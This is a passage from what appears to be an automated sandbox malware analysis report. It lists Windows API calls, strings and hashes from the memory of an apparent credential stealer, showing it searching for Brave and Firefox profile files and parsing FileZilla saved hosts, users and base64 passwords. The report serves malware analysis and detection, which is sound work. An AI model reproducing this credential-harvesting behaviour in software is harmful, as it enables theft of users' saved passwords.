                          • lstrlen.KERNEL32(00651794), ref: 0062DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E022
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062E02E
                          • lstrlen.KERNEL32(01298BA0), ref: 0062E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0062E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0062E0E7
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062E11F
                          • lstrlen.KERNEL32(0129CEA8), ref: 0062E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0062E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E19F
                          • lstrcat.KERNEL32(00000000), ref: 0062E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0062E1F9
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062E22F
                          • lstrlen.KERNEL32(01298B40), ref: 0062E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E261
                          • lstrcat.KERNEL32(00000000,01298B40), ref: 0062E269
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0062E988
                          • FindClose.KERNEL32(00000000), ref: 0062E997
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                          • String ID: Brave$Preferences$\Brave\Preferences
                          • API String ID: 1346089424-1230934161
                          • Opcode ID: 97a8fda53679402a2786fa06077219589c4be69a8e9b37e80915abf8c9de7995
                          • Instruction ID: 4b1f6d45517f27945c9b357f41d7dfc8b557bd10caae1ddd34cb35a609e57428
                          • Opcode Fuzzy Hash: 97a8fda53679402a2786fa06077219589c4be69a8e9b37e80915abf8c9de7995
                          • Instruction Fuzzy Hash: DB528F70A11B26ABCB61EF65EC99AEE77BABF04301F044528F84997351DB38DC458F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 006260FF
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00626152
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00626185
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006261B5
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006261F0
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00626223
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00626233
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 8a9dd344f43c0942b326966167eccfdebf7ef2ff98fd4961f7091b33e48a4cf6
                          • Instruction ID: 6d4c1110b6622d0c8dcddca2873ea9cbea41b3c06d831a31335be2522cba9bc6
                          • Opcode Fuzzy Hash: 8a9dd344f43c0942b326966167eccfdebf7ef2ff98fd4961f7091b33e48a4cf6
                          • Instruction Fuzzy Hash: F9527C71D10A26ABCB61EFA5EC49AEE77BABF04301F154528F805E7251DB38ED018F94
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636B9D
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636BCD
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636BFD
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636C2F
                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00636C3C
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00636C43
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00636C5A
                          • lstrlen.KERNEL32(00000000), ref: 00636C65
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636CA8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636CCF
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00636CE2
                          • lstrlen.KERNEL32(00000000), ref: 00636CED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636D30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636D57
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00636D6A
                          • lstrlen.KERNEL32(00000000), ref: 00636D75
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636DB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636DDF
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00636DF2
                          • lstrlen.KERNEL32(00000000), ref: 00636E01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636E49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636E71
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00636E94
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00636EA8
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00636EC9
                          • LocalFree.KERNEL32(00000000), ref: 00636ED4
                          • lstrlen.KERNEL32(?), ref: 00636F6E
                          • lstrlen.KERNEL32(?), ref: 00636F81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 2641759534-2314656281
                          • Opcode ID: c48c69d16fd700ba535943ad97d770ccd1cab1567e09eaf38a13519b0e9e3d66
                          • Instruction ID: d16a132b5513e69dda70d78a911766a26f5b5ae0b748cb1222e4560cd1307341
                          • Opcode Fuzzy Hash: c48c69d16fd700ba535943ad97d770ccd1cab1567e09eaf38a13519b0e9e3d66
                          • Instruction Fuzzy Hash: 0B02A170A11726BBCB61ABB1DC59AAE7BBBBF04705F145518F846E7341DF38D8018BA0
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00634B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00634B7F
                          • lstrlen.KERNEL32(00654CA8), ref: 00634B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634BA7
                          • lstrcat.KERNEL32(00000000,00654CA8), ref: 00634BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00634BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: prefs.js
                          • API String ID: 2567437900-3783873740
                          • Opcode ID: 3f4a91fc16060d2e5eb9192dac6751ceeee68c3d6174ce3b3cde26d0c8d31dab
                          • Instruction ID: ec1116db4b17e79c13984e99264700f637d6ef2ddd9595dc88282020f9d47272
                          • Opcode Fuzzy Hash: 3f4a91fc16060d2e5eb9192dac6751ceeee68c3d6174ce3b3cde26d0c8d31dab
                          • Instruction Fuzzy Hash: 66922F70A01B12CFDB64CF29D948B99B7E6BF44315F1981ADE84A9B361DB35EC41CB80
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00631291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006312B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006312BF
                          • lstrlen.KERNEL32(00654CA8), ref: 006312CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006312E7
                          • lstrcat.KERNEL32(00000000,00654CA8), ref: 006312F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0063133A
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0063135C
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 00631376
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006313AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 006313D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006313E2
                          • lstrlen.KERNEL32(00651794), ref: 006313ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063140A
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631416
                          • lstrlen.KERNEL32(?), ref: 00631423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631443
                          • lstrcat.KERNEL32(00000000,?), ref: 00631451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063147A
                          • StrCmpCA.SHLWAPI(?,0129CE18), ref: 006314A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 006314E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631535
                          • StrCmpCA.SHLWAPI(?,0129D468), ref: 00631552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00631593
                          • lstrcpy.KERNEL32(00000000,?), ref: 006315BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006315E4
                          • StrCmpCA.SHLWAPI(?,0129CD58), ref: 00631602
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631633
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063165C
                          • lstrcpy.KERNEL32(00000000,?), ref: 00631685
                          • StrCmpCA.SHLWAPI(?,0129CE30), ref: 006316B3
                          • lstrcpy.KERNEL32(00000000,?), ref: 006316F4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063171D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631745
                          • lstrcpy.KERNEL32(00000000,?), ref: 00631796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006317BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 006317F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0063181C
                          • FindClose.KERNEL32(00000000), ref: 0063182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: f7d432f86ca2cea94230b1a629a585c34fc5d79f3f443a97b4014d377b79f99b
                          • Instruction ID: f8bdb766c3c7f52b9ce52a745044a0bf68eef881cf5e0c11ded2580f9338f6c4
                          • Opcode Fuzzy Hash: f7d432f86ca2cea94230b1a629a585c34fc5d79f3f443a97b4014d377b79f99b
                          • Instruction Fuzzy Hash: DF127071A107169BDB20EF79E899AEE77BABF45301F04452CF84ADB250DB38DC458B90
                          APIs
                          • wsprintfA.USER32 ref: 0063CBFC
                          • FindFirstFileA.KERNEL32(?,?), ref: 0063CC13
                          • lstrcat.KERNEL32(?,?), ref: 0063CC5F
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0063CC71
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 0063CC8B
                          • wsprintfA.USER32 ref: 0063CCB0
                          • PathMatchSpecA.SHLWAPI(?,01298B80), ref: 0063CCE2
                          • CoInitialize.OLE32(00000000), ref: 0063CCEE
                            • Part of subcall function 0063CAE0: CoCreateInstance.COMBASE(0064B110,00000000,00000001,0064B100,?), ref: 0063CB06
                            • Part of subcall function 0063CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0063CB46
                            • Part of subcall function 0063CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0063CBC9
                          • CoUninitialize.COMBASE ref: 0063CD09
                          • lstrcat.KERNEL32(?,?), ref: 0063CD2E
                          • lstrlen.KERNEL32(?), ref: 0063CD3B
                          • StrCmpCA.SHLWAPI(?,0064CFEC), ref: 0063CD55
                          • wsprintfA.USER32 ref: 0063CD7D
                          • wsprintfA.USER32 ref: 0063CD9C
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0063CDB0
                          • wsprintfA.USER32 ref: 0063CDD8
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0063CDF1
                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0063CE10
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 0063CE28
                          • CloseHandle.KERNEL32(00000000), ref: 0063CE33
                          • CloseHandle.KERNEL32(00000000), ref: 0063CE3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0063CE54
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063CE94
                          • FindNextFileA.KERNEL32(?,?), ref: 0063CF8D
                          • FindClose.KERNEL32(?), ref: 0063CF9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                          • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 3860919712-2388001722
                          • Opcode ID: 9e10fb1a64f48fe1af79b0478268b2ecb678083a1b9a074e8367740bdbcbc081
                          • Instruction ID: ea0131fc5becd2cef573028f98914f9e28929c883a8e730f40be0d738b05c7d8
                          • Opcode Fuzzy Hash: 9e10fb1a64f48fe1af79b0478268b2ecb678083a1b9a074e8367740bdbcbc081
                          • Instruction Fuzzy Hash: F0C13071900319AFDB60DF64DC45AEE777ABF88311F044599F90AA7290EE34AA85CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00631291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006312B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006312BF
                          • lstrlen.KERNEL32(00654CA8), ref: 006312CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006312E7
                          • lstrcat.KERNEL32(00000000,00654CA8), ref: 006312F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0063133A
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0063135C
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 00631376
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006313AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 006313D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006313E2
                          • lstrlen.KERNEL32(00651794), ref: 006313ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063140A
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631416
                          • lstrlen.KERNEL32(?), ref: 00631423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631443
                          • lstrcat.KERNEL32(00000000,?), ref: 00631451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063147A
                          • StrCmpCA.SHLWAPI(?,0129CE18), ref: 006314A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 006314E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631535
                          • StrCmpCA.SHLWAPI(?,0129D468), ref: 00631552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00631593
                          • lstrcpy.KERNEL32(00000000,?), ref: 006315BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006315E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00631796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006317BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 006317F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0063181C
                          • FindClose.KERNEL32(00000000), ref: 0063182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: 736fa34ff351e2161c0b25283d16a3d72598f538233d3af201908ba81e745402
                          • Instruction ID: b9e30690170dae55de3d292f9c76e00ec6c6c9173a3b95f2cb5519ef34411c9b
